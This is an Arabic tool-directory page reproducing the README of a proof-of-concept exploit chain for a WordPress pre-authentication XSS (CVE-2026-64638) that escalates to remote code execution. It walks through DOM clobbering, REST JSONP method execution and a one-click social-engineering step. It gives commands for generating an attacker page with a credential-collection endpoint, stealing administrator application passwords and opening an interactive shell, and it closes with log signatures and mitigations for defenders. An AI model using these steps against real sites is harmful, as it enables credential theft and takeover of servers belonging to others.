Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
poc-CVE-2026-64638- — سلسلة استغلال (PoC) لثغرة XSS قبل المصادقة في WordPress تصل إلى تنفيذ أوامر عن بُعد (RCE) عبر DOM clobbering وREST JSONP/SOME ورفع الإضافات، مع التحقق عبر مختبر Docker وقشرة تفاعلية. | Kitploit
أدوات/GitHubGitHub/mohwahyudi/poc-cve-2026-64638-
أدوات التصيدتوليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالهندسة الاجتماعيةالفريق الأحمر

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
mohwahyudi/poc-cve-2026-64638-

poc-CVE-2026-64638-

سلسلة استغلال (PoC) لثغرة XSS قبل المصادقة في WordPress تصل إلى تنفيذ أوامر عن بُعد (RCE) عبر DOM clobbering وREST JSONP/SOME ورفع الإضافات، مع التحقق عبر مختبر Docker وقشرة تفاعلية.

عرض المستودع
منذ 12 أياملم تتم المراجعة بعد

XSS2Shell — CVE-2026-64638 إثبات المفهوم

سلسلة استغلال من XSS قبل المصادقة إلى RCE في ووردبريس، بناءً على بحث من pwn.ai نُشر على ionsec.io.

⚠️ تحذير قانوني: لأغراض تعليمية واختبارات مصرّح بها فقط. استخدمه فقط ضد الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها.

التحقق المخبري

الخطوةالتقنيةالحالة
1XSS بفارق التحليل (Parser differential XSS) (sanitize_user + فجوة تحليل المتصفح)✅ تم التحقق
2استغلال DOM clobbering (<area id=ajaxurl>، <div id=color-picker>)✅ تم التحقق
3التشغيل التلقائي عبر user-profile.js في صفحة تسجيل الدخول✅ تم التحقق
4استدعاء REST JSONP يسمح بالتنقل بالنقاط (window.opener.approve.click)✅ تم التحقق
5تجاوز عبر _method=GET + _envelope=1✅ تم التحقق
6سرقة كلمات مرور التطبيقات (SOME)⚠️ يتطلب نقرة من المسؤول
7رفع إضافة → تنفيذ PHP (بدون تفعيل)⚠️ يتطلب بيانات اعتماد

راجع lab/VERIFICATION_REPORT.md للتفاصيل الكاملة.

ملخص الثغرة

سلسلة الاستغلال (7 خطوات)

root@kitploit:~
الخطوة 1: XSS بفارق التحليل
  └─ sanitize_user() يسمح بـ "< area>" و"< div>" و"< button>" (مسافة بعد "<")
     المتصفح يحلل هذه العناصر كعناصر HTML حقيقية في رسالة خطأ تسجيل الدخول

الخطوة 2: DOM Clobbering
  └─ <area id=ajaxurl>   ← يظلل window.ajaxurl (HTMLAreaElement)
     <div id=color-picker class=reset-pass-submit> ← يلبي محددات jQuery
     <button class="wp-generate-pw color-option"> ← معالج نقر مفوَّض

الخطوة 3: التشغيل التلقائي عبر user-profile.js
  └─ يُحمَّل على wp-login.php (السطر 1398)
     $('.reset-pass-submit button.wp-generate-pw').trigger('click') يُطلَق
     $.post(ajaxurl, ...) → عنوان URL الهدف = area.href (يتحكم به المهاجم)

الخطوة 4: REST API JSONP + SOME
  └─ _jsonp=window.opener.approve.click → تنفيذ أسلوب من نفس الأصل (Same Origin Method Execution)
     _envelope=1 → تجاوز خطأ المصادقة، وتغليف الاستجابة برمز 200
     wp_check_jsonp_callback: التعبير النمطي /[^\w\.]/ يسمح بالتنقل بالنقاط

الخطوة 5: هندسة اجتماعية (نقرة واحدة)
  └─ المسؤول يرى صفحة /wp-admin/authorize-application.php الحقيقية
     ينقر على "Approve" ← يتم إنشاء كلمة مرور تطبيق

الخطوة 6: سرقة بيانات الاعتماد
  └─ تظهر كلمة المرور في سلسلة استعلام إعادة التوجيه ← تُقرأ بواسطة النافذة الفرعية (نفس الأصل)

الخطوة 7: رفع إضافة → RCE
  └─ رفع ملف ZIP للإضافة ← يتم استخراجه إلى /wp-content/plugins/{slug}/
     ملفات PHP قابلة للتنفيذ مباشرة بدون تفعيل

بدء سريع

1. تثبيت التبعيات

root@kitploit:~
pip install requests

2. استطلاع الهدف

root@kitploit:~
python3 xss2shell_poc.py --target https://wp-target.com --check

# مع وكيل Burp Suite
python3 xss2shell_poc.py --target https://wp-target.com --check --proxy http://127.0.0.1:8081

3. بيئة Docker المخبرية (للاختبار)

root@kitploit:~
cd lab
docker-compose up -d
# ووردبريس 6.0.3 على http://localhost:8080
# المسؤول: admin / password123

4. التحقق من متجه XSS ضد البيئة المخبرية

root@kitploit:~
python3 xss2shell_poc.py --target http://localhost:8080 --check --no-ssl

5. إنشاء صفحة المهاجم

root@kitploit:~
python3 xss2shell_poc.py --target https://wp-target.com \
    --attacker-host https://your-server.com --generate-page

ارفع xss2shell_attacker.html وcollect.php إلى خادمك.

6. إرسال الرابط إلى المسؤول

يجب على مسؤول ووردبريس مسجَّل الدخول زيارة صفحة المهاجم والنقر مرة واحدة.

7. استلام بيانات الاعتماد

تظهر بيانات الاعتماد في collected_creds.json على خادمك:

root@kitploit:~
[
  {
    "timestamp": "2026-08-08T...",
    "username": "admin",
    "password": "AbCd 1234 EfGh 5678",
    "site": "https://wp-target.com"
  }
]

8. تنفيذ سلسلة RCE

root@kitploit:~
python3 xss2shell_poc.py --target https://wp-target.com \
    --username admin --app-password "AbCd 1234 EfGh 5678" --rce

9. شل تفاعلي

root@kitploit:~
python3 xss2shell_poc.py --target https://wp-target.com \
    --username admin --app-password "AbCd 1234 EfGh 5678" --shell

10. التنظيف

root@kitploit:~
python3 xss2shell_poc.py --target https://wp-target.com \
    --username admin --app-password "AbCd 1234 EfGh 5678" --cleanup

الكشف (تحليل سجلات الخادم)

توقيعات للبحث عنها في سجلات الخادم:

  • سجل الوصول: POST /wp-login.php مع جسم يحتوي على < area، < div، < button
  • سجل الوصول: طلب REST مع معامل الاستعلام _jsonp= (خاصة _jsonp=a.b.c — النقطة هي مؤشر SOME)
  • سجل الوصول: _envelope=1 + _method=GET على مسارات يجب أن ترفضهما
  • سجل الوصول: POST /wp-admin/update.php?action=upload-plugin من عنوان IP غير معروف
  • سجل الوصول: GET /wp-content/plugins/{unknown-plugin}/*.php — ملف PHP في إضافة لم تُفعَّل مطلقًا
  • سجل التطبيق: إنشاء كلمة مرور تطبيق خلال ثوانٍ من طلب إلى authorize-application.php

التخفيف

  1. التحديث إلى ووردبريس 7.0.3 (أو أحدث إصدار نقطي لفرعك)
  2. تدوير جميع كلمات مرور تطبيقات المسؤولين
  3. تعطيل كلمات مرور التطبيقات إذا لم تكن مطلوبة:
    root@kitploit:~
    add_filter('wp_is_application_passwords_available', '__return_false');
    
  4. تعطيل REST JSONP:
    root@kitploit:~
    add_filter('rest_jsonp_enabled', '__return_false');
    
  5. تعطيل تعديل الملفات:
    root@kitploit:~
    define('DISALLOW_FILE_MODS', true);
    
  6. قواعد WAF: احظر _jsonp= و_envelope= على نقاط نهاية REST؛ واحظر < area في جسم POST إلى wp-login.php

هيكل الملفات

root@kitploit:~
xss2shell/
├── README.md                      # التوثيق (هذا الملف)
├── xss2shell_poc.py               # سكربت إثبات المفهوم الرئيسي
├── xss2shell_attacker.html        # صفحة المهاجم المُنشأة
├── collect.php                    # نقطة نهاية جمع بيانات الاعتماد
└── lab/
    ├── docker-compose.yml         # بيئة Docker المخبرية (WP 6.0.3)
    ├── VERIFICATION_REPORT.md     # تحقق خطوة بخطوة
    ├── test_sanitize.php          # اختبارات sanitize_user()
    ├── test_full_payload.php      # اختبار سلسلة الحمولة الكاملة
    ├── test_browser.html          # اختبار DOM clobbering في المتصفح
    ├── test_end_to_end.php        # اختبار PHP من النهاية إلى النهاية
    └── verify_xss.sh              # اختبارات curl آلية

المراجع

  • IonSec — XSS2Shell: WordPress Pre-Auth XSS to RCE
  • pwn.ai — الاكتشاف الأصلي
  • إصدارات ووردبريس الأمنية
تنزيل الأداة
العنصرالتفاصيل
CVECVE-2026-64638
CVSS 4.08.9
الإصدارات المتأثرةووردبريس 4.7 – 7.0.2 (الإصدارات النقطية غير المصححة)
الإصدار المُصحَّحووردبريس 7.0.3 (6 أغسطس 2026)، وتم توفيره لجميع فروع الصيانة
المصادقةقبل المصادقة (XSS بدون توثيق)
الأثرتنفيذ أوامر عن بُعد (RCE) عبر رفع إضافة